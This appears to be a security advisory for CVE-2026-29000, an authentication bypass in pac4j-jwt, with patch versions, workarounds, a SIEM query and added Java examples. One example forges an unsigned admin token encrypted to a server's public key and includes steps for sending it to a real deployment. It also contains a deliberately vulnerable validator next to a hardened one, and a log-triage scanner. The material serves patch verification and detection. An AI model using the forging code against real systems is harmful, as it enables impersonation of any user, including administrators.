CVE-2026-29000

10.0 CRITICAL

📋 TL;DR

This critical authentication bypass in pac4j-jwt lets an attacker who holds only the server's RSA public key forge authentication tokens and log in as any user, including administrators. The attacker encrypts an unsigned claims set (a PlainJWT) into a JWE using that public key; a vulnerable JwtAuthenticator decrypts the JWE and accepts the inner claims without ever verifying a signature. Every system that authenticates with a vulnerable pac4j-jwt version is affected.

💻 Affected Systems

Products:
  • pac4j-jwt
Versions: prior to 4.5.9 (4.x), 5.7.9 (5.x), and 6.3.3 (6.x)
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Affects systems that use JwtAuthenticator with encrypted (JWE) tokens. The flaw is in how a PlainJWT, an unsigned token with alg "none", is handled when it is nested inside a JWE.

⚠️ Manual Verification Required

The database entry behind this page carries no machine-readable version range, so automatic vulnerability detection cannot tell whether your system is affected.

Why? The NVD/vendor entry does not publish structured version ranges. The fixed versions are nevertheless stated in the vendor advisory (4.5.9, 5.7.9, 6.3.3; see Affected Systems and Official Fix), so compare your installed version against them by hand.

Recommended Actions:
  1. Review the CVE details at NVD
  2. Check vendor security advisories for your specific version
  3. Test if the vulnerability is exploitable in your environment
  4. Consider updating to the latest version as a precaution

⚠️ Risk & Real-World Impact

🔴 Worst Case

Complete system compromise where attackers gain administrative access, potentially leading to data theft, privilege escalation, and full control over affected applications.

🟠 Likely Case

Unauthorized access to sensitive data and functionality, account takeover, and privilege escalation within applications using pac4j-jwt authentication.

🟢 If Mitigated

Limited impact if proper network segmentation, monitoring, and additional authentication layers are in place, though the authentication bypass itself remains possible until the library is patched.

🌐 Internet-Facing: HIGH
🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

The only prerequisite is the server's RSA public key, which JWT deployments routinely expose (for example through a JWKS endpoint or in client configuration); no valid account or credential is needed to build the forged token. The technique is documented in the vendor advisory linked below.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 4.5.9, 5.7.9, or 6.3.3 depending on major version

Vendor Advisory: https://www.pac4j.org/blog/security-advisory-pac4j-jwt-jwtauthenticator.html

Restart Required: Yes

Instructions:

1. Identify your pac4j-jwt major version (4.x, 5.x, or 6.x).
2. Update to the corresponding patched version: 4.5.9 for 4.x, 5.7.9 for 5.x, or 6.3.3 for 6.x.
3. Restart your application.
4. Test authentication functionality.

🔧 Temporary Workarounds

Disable JWE-wrapped PlainJWT support

Applies to: all affected versions

Configure JwtAuthenticator to accept only signed JWTs, and to reject any JWE whose decrypted payload is a PlainJWT (unsigned) token rather than a signed one.

🧯 If You Can't Patch

  • Implement additional authentication layer (MFA, IP whitelisting)
  • Monitor authentication logs for suspicious JWT patterns and implement rate limiting

🔍 How to Verify

Check if Vulnerable:

Check your pac4j-jwt version in dependency files (pom.xml, build.gradle) or runtime. If version is below 4.5.9, 5.7.9, or 6.3.3 depending on major version, you are vulnerable.

Check Version:

Check the project dependency files, or list the resolved dependency:
  • Maven: mvn dependency:tree | grep pac4j-jwt
  • Gradle: gradle dependencies | grep pac4j-jwt

Verify Fix Applied:

Confirm that the patched version is the one actually resolved at runtime (check the dependency tree, not only the declared version), then test that a JWE-wrapped PlainJWT carrying arbitrary claims, encrypted to your deployment's public key, is rejected by the authenticator.
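The following is an added example, not pac4j's code and not the vendor's proof of concept. It is written against nimbus-jose-jwt, the JOSE library pac4j-jwt is built on, and does not use the pac4j JwtAuthenticator API. It builds the token shape described in the Exploit Status section (an unsigned PlainJWT encrypted to the server's RSA public key), runs it through a vulnerable acceptance routine that trusts whatever JWT comes out of the JWE, and then through a hardened routine that requires a signed nested JWT, which is the behaviour the workaround above asks for and the rejection the "Verify Fix Applied" step needs to observe. The on-the-fly key generation, the `role` claim, and the RSA-OAEP-256/A256GCM algorithm choice are assumptions for the demo.

```java
import com.nimbusds.jose.EncryptionMethod;
import com.nimbusds.jose.JOSEException;
import com.nimbusds.jose.JWEAlgorithm;
import com.nimbusds.jose.JWEHeader;
import com.nimbusds.jose.JWEObject;
import com.nimbusds.jose.JWSAlgorithm;
import com.nimbusds.jose.JWSHeader;
import com.nimbusds.jose.Payload;
import com.nimbusds.jose.crypto.RSADecrypter;
import com.nimbusds.jose.crypto.RSAEncrypter;
import com.nimbusds.jose.crypto.RSASSASigner;
import com.nimbusds.jose.crypto.RSASSAVerifier;
import com.nimbusds.jose.jwk.RSAKey;
import com.nimbusds.jose.jwk.gen.RSAKeyGenerator;
import com.nimbusds.jwt.JWT;
import com.nimbusds.jwt.JWTClaimsSet;
import com.nimbusds.jwt.JWTParser;
import com.nimbusds.jwt.PlainJWT;
import com.nimbusds.jwt.SignedJWT;

import java.util.Date;

/** Forges a JWE-wrapped PlainJWT and runs it through a vulnerable and a hardened acceptance routine. */
public class JweWrappedPlainJwtCheck {

    private static final JWEHeader JWE_HEADER =
            new JWEHeader.Builder(JWEAlgorithm.RSA_OAEP_256, EncryptionMethod.A256GCM)
                    .contentType("JWT")   // declares a nested JWT inside the JWE
                    .build();

    private static JWTClaimsSet claims(String subject, String role) {
        return new JWTClaimsSet.Builder()
                .subject(subject)
                .claim("role", role)   // hypothetical claim name, demo only
                .expirationTime(new Date(System.currentTimeMillis() + 3600_000L))
                .build();
    }

    /** Attacker step: needs only the server's PUBLIC key. The inner JWT has alg=none and no signature. */
    static String forgeToken(RSAKey serverPublicKey, String subject, String role) throws JOSEException {
        PlainJWT unsigned = new PlainJWT(claims(subject, role));
        JWEObject jwe = new JWEObject(JWE_HEADER, new Payload(unsigned.serialize()));
        jwe.encrypt(new RSAEncrypter(serverPublicKey));
        return jwe.serialize();
    }

    /** Legitimate issuer: sign with the issuer's private key, then encrypt to the server's public key. */
    static String issueToken(RSAKey issuerPrivateKey, RSAKey serverPublicKey, String subject, String role)
            throws JOSEException {
        SignedJWT signed = new SignedJWT(new JWSHeader.Builder(JWSAlgorithm.RS256).build(), claims(subject, role));
        signed.sign(new RSASSASigner(issuerPrivateKey));
        JWEObject jwe = new JWEObject(JWE_HEADER, new Payload(signed.serialize()));
        jwe.encrypt(new RSAEncrypter(serverPublicKey));
        return jwe.serialize();
    }

    /** VULNERABLE pattern: decrypt, then trust whatever JWT came out, signed or not. */
    static JWTClaimsSet vulnerableValidate(String token, RSAKey serverPrivateKey) throws Exception {
        JWEObject jwe = JWEObject.parse(token);
        jwe.decrypt(new RSADecrypter(serverPrivateKey));
        JWT inner = JWTParser.parse(jwe.getPayload().toString());   // may be a PlainJWT
        return inner.getJWTClaimsSet();                               // no signature check at all
    }

    /** HARDENED pattern: the nested token must be a SignedJWT whose signature verifies. */
    static JWTClaimsSet hardenedValidate(String token, RSAKey serverPrivateKey, RSAKey issuerPublicKey)
            throws Exception {
        JWEObject jwe = JWEObject.parse(token);
        jwe.decrypt(new RSADecrypter(serverPrivateKey));
        JWT inner = JWTParser.parse(jwe.getPayload().toString());
        if (!(inner instanceof SignedJWT)) {
            throw new SecurityException("rejected: nested JWT is " + inner.getClass().getSimpleName()
                    + ", not SignedJWT");
        }
        SignedJWT signed = (SignedJWT) inner;
        if (!signed.verify(new RSASSAVerifier(issuerPublicKey))) {
            throw new SecurityException("rejected: bad signature on nested JWT");
        }
        return signed.getJWTClaimsSet();
    }

    public static void main(String[] args) throws Exception {
        // Demo keys generated on the fly (assumption). Real deployments keep separate encryption
        // and signing keys; the point is that the attacker holds only the public half of encKey.
        RSAKey encKey = new RSAKeyGenerator(2048).generate();
        RSAKey sigKey = new RSAKeyGenerator(2048).generate();

        String forged = forgeToken(encKey.toPublicJWK(), "admin", "ADMIN");
        System.out.println("vulnerable accepted forged token as: "
                + vulnerableValidate(forged, encKey).getSubject());
        try {
            hardenedValidate(forged, encKey, sigKey.toPublicJWK());
            System.out.println("hardened accepted forged token (fix NOT effective)");
        } catch (SecurityException e) {
            System.out.println("hardened " + e.getMessage());
        }

        String legit = issueToken(sigKey, encKey.toPublicJWK(), "alice", "USER");
        System.out.println("hardened accepted legitimate token as: "
                + hardenedValidate(legit, encKey, sigKey.toPublicJWK()).getSubject());
    }
}
```

Compile with nimbus-jose-jwt (Maven coordinate com.nimbusds:nimbus-jose-jwt) on the classpath. To test a real deployment rather than the demo routines, replace encKey.toPublicJWK() with the deployment's actual encryption public key (RSAKey.parse on its JWK JSON), send the output of forgeToken as the bearer token, and confirm the application answers with an authentication failure; a 200 with the forged subject means the vulnerable version is still in use.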

📡 Detection & Monitoring

Log Indicators:

  • Authentication attempts with JWE-wrapped PlainJWT tokens
  • Successful authentication with unexpected user roles or subjects
  • Multiple authentication attempts with varying JWT claims

Network Indicators:

  • Unusual JWT token patterns in authentication requests
  • Requests containing JWE-wrapped PlainJWT with modified claims

SIEM Query:

source="authentication_logs" AND (message="JWE-wrapped PlainJWT" OR message="unexpected JWT claim" OR message="authentication bypass")

The message strings above are placeholders: pac4j-jwt does not emit these exact phrases, so map them to the authentication-failure and token-parsing messages your application actually logs before relying on the query.
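An added example, not part of the page or of pac4j, for the log and network indicators listed above: it scans access-log lines for bearer tokens and classifies each by its compact-serialization shape, flagging JWE tokens (five dot-separated segments, the only shape this attack can take on the wire) and, as a related shape not discussed on the page, bare unsigned tokens with alg "none". The log lines are constructed for the demo, the token bodies are dummy data, and the log format is an assumption; plain Java is used with no JOSE library.

```java
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.Base64;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/** Triage bearer tokens in access logs by JOSE shape: JWS, JWE, unsigned (alg none) or malformed. */
public class JwtLogTriage {

    private static final Base64.Encoder B64 = Base64.getUrlEncoder().withoutPadding();
    // A compact JOSE token: 3 segments (JWS / PlainJWT) or 5 segments (JWE); middle segments may be empty
    private static final Pattern BEARER =
            Pattern.compile("Bearer\\s+([A-Za-z0-9_\\-]+(?:\\.[A-Za-z0-9_\\-]*){2,4})");
    private static final Pattern ALG = Pattern.compile("\"alg\"\\s*:\\s*\"([^\"]*)\"");

    private static String b64(String s) {
        return B64.encodeToString(s.getBytes(StandardCharsets.UTF_8));
    }

    /** Constructed sample log lines (assumed format: client, method, path, header, status). */
    static List<String> sampleLog() {
        String jws = b64("{\"alg\":\"RS256\",\"typ\":\"JWT\"}") + "." + b64("{\"sub\":\"alice\"}") + "." + b64("sig");
        String plain = b64("{\"alg\":\"none\"}") + "." + b64("{\"sub\":\"admin\"}") + ".";
        String jwe = b64("{\"alg\":\"RSA-OAEP-256\",\"enc\":\"A256GCM\",\"cty\":\"JWT\"}") + "."
                + b64("key") + "." + b64("iv") + "." + b64("ct") + "." + b64("tag");
        return List.of(
                "10.0.0.5 GET /api/me Authorization: Bearer " + jws + " 200",
                "10.0.0.9 GET /api/admin Authorization: Bearer " + plain + " 200",
                "198.51.100.7 GET /api/admin Authorization: Bearer " + jwe + " 200");
    }

    /** Classify a compact token by segment count and the alg declared in its protected header. */
    static String classify(String token) {
        String[] parts = token.split("\\.", -1);
        String header;
        try {
            header = new String(Base64.getUrlDecoder().decode(parts[0]), StandardCharsets.UTF_8);
        } catch (IllegalArgumentException e) {
            return "MALFORMED";
        }
        Matcher m = ALG.matcher(header);
        String alg = m.find() ? m.group(1) : "?";
        if (parts.length == 5) return "JWE(alg=" + alg + ")";
        if (parts.length == 3) return "none".equalsIgnoreCase(alg) ? "PLAIN(unsigned)" : "JWS(alg=" + alg + ")";
        return "MALFORMED";
    }

    /**
     * Flag unsigned and malformed tokens outright. JWE tokens cannot be inspected further here because
     * the nested JWT is encrypted: if your deployment never issues JWE, pass issuesJwe=false so every
     * JWE is an anomaly; otherwise they are listed for review and the real check must happen in the app.
     */
    static List<String> triage(List<String> lines, boolean issuesJwe) {
        List<String> findings = new ArrayList<>();
        for (String line : lines) {
            Matcher m = BEARER.matcher(line);
            if (!m.find()) continue;
            String kind = classify(m.group(1));
            if (kind.startsWith("PLAIN") || kind.equals("MALFORMED") || (kind.startsWith("JWE") && !issuesJwe)) {
                findings.add("ALERT " + kind + " :: " + line);
            } else if (kind.startsWith("JWE")) {
                findings.add("REVIEW " + kind + " :: " + line);
            }
        }
        return findings;
    }

    public static void main(String[] args) {
        triage(sampleLog(), true).forEach(System.out::println);
    }
}
```

Because the forged PlainJWT is hidden inside the JWE ciphertext, edge-side triage can only narrow the set of requests to look at; the definitive indicator is the application's own authentication log after patching, where these tokens show up as rejected rather than as successful logins with unexpected subjects.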
